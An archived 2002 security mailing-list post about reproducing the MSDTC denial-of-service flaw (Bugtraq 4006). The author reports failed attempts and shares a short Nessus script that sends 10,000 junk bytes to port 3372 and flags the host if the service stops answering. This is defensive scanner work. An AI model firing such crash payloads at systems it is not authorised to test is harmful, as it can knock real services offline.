MSDTC dos attack:
bugtraq id 4006
object msdtc
class Failure to Handle Exceptional Conditions
http://www.securityfocus.com/bid/4006
(see :
tried to reproduce by sending 1024 bytes (and 2048 bytes and 10K bytes) of
random data to msdtc listeingt port 3372.
no effect.
no ms event log, service still running.
system is MS win2k, sp2, running ms sql server 7 sp2.
Methodology used: nessus security scanner:
(am I reading things reight in the advisory, and would my script do what the
advisory suggests?)
if (get_port_state(3372))
{
sock3372 = open_sock_tcp(3372);
if (sock3372)
{
send(socket:sock3372, data:crap(10000));
close(sock3372);
sleep(5);
sock3372_sec = open_sock_tcp(3372);
if (!sock3372_sec)
{
security_hole(port:3372);
}
}
}
I verified logic by starting security test and stoping the service by hand
(and it gave me positive, which is what I would have thought if I manually
stopped service during test)
--
Michael Scheidell
Secnap Network Security, LLC
(561) 368-9561 scheidellat_private
Sign up Live WEBCAST Q & A : Should I migrate from IIS?
http://www.secnap.net
This archive was generated by hypermail 2b30 : Sun Feb 03 2002 - 18:05:00 PST